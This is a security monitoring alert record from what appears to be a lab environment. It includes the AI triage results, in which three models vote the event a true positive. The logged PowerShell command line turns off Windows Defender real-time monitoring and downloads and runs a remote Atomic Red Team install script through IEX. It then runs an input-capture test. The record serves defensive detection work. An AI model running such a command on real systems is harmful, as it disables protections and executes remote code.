{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 2440",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 193449984,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld6D5F.tmp.bat T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4567040,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 2440,
        "THIS_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "THREADS": 3,
        "TIMESTAMP": 1774364725358,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 2440,
      "PROCESS_ID": 3164,
      "THREADS": 32,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
      "event_time": 1774364726507,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3164,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "0c13305cb3f73d15515e789969c2a835",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "6b593eddb775332b5050941f69c2a838"
    }
  },
  "detect_id": "3c657edb-9fcf-4589-a803-0aea69c2a839",
  "gen_time": 1774364729672,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364726\u0026selected=6b593eddb775332b5050941f69c2a838",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
    "event_time": 1774364726507,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3164,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "0c13305cb3f73d15515e789969c2a835",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "6b593eddb775332b5050941f69c2a838"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364729000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.96,
  "false_positive_reason": null,
  "investigation_questions": [
    "Was there a scheduled security test or red team activity during this timeframe?",
    "What user or automated process created the batch file pld6D5F.tmp.bat?",
    "Has this sensor or OID previously been used for Atomic Red Team testing?"
  ],
  "ioc_analysis": "Powershell.exe (de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c) is a legitimate signed Microsoft binary, but its use to disable security controls and download external scripts is a high-risk activity. The activity is consistent with a deliberate security simulation using the Atomic Red Team framework hosted on raw.githubusercontent.com.",
  "iocs_extracted": [
    "raw.githubusercontent.com",
    "cdn.oneget.org",
    "powershell.exe",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "pld6D5F.tmp.bat"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1071.001",
    "T1056.001",
    "T1041",
    "T1567.003"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Confirm with the security or IT team if an authorized Atomic Red Team simulation or red team exercise was scheduled for this host.",
    "If the activity was unauthorized, isolate the host and investigate for any non-simulation malicious activity.",
    "Immediately re-enable Windows Defender Real-Time Monitoring on the affected endpoint.",
    "Audit the source of the batch file pld6D5F.tmp.bat in C:\\Windows\\TEMP\\."
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: UNANIMOUS (3/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThe detection identifies an instance of PowerShell being used to disable Windows Defender Real-Time Monitoring, followed by the installation and execution of the Atomic Red Team (ART) security testing framework. The command line explicitly disables monitoring and then downloads the ART installation script from its official GitHub repository to invoke multiple Mitre ATT\u0026CK mapped tests including T1056.001 (Input Capture) and T1567.003 (Exfiltration to Cloud Storage).\n\n**IOC Analysis:** Powershell.exe (de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c) is a legitimate signed Microsoft binary, but its use to disable security controls and download external scripts is a high-risk activity. The activity is consistent with a deliberate security simulation using the Atomic Red Team framework hosted on raw.githubusercontent.com.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.98\nThis event represents a confirmed malicious activity where an attacker executed PowerShell commands to disable real-time monitoring and deploy the Atomic Red Team framework using IEX (Invoke-Expression) to download and execute remote scripts.\n\n**IOC Analysis:** The command line explicitly shows disabling Microsoft Defender Real-Time Monitoring, downloading code from a GitHub repository via Invoke-WebRequest, and executing it with IEX. The process is running under NT AUTHORITY\\SYSTEM, indicating privilege escalation or initial compromise. While the file path (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and hash are legitimate Microsoft binaries, the command execution demonstrates clear malicious intent.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nA PowerShell process running as SYSTEM with a malicious command line disables real-time monitoring and executes scripts from GitHub, indicating potential privilege abuse and evasion techniques.\n\n**IOC Analysis:** The FILE_PATH is a legitimate system binary in C:\\Windows\\System32, but the command line shows malicious activity by disabling antivirus real-time monitoring and downloading/installing red team tools. The hash is for a Microsoft-signed binary, but the context suggests compromise. The URL accessed is suspicious for downloading malicious scripts.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 98% confidence)",
      "deepseek-r1:8b: true_positive (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.98,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 3,
    "winning_verdict": "true_positive"
  }
}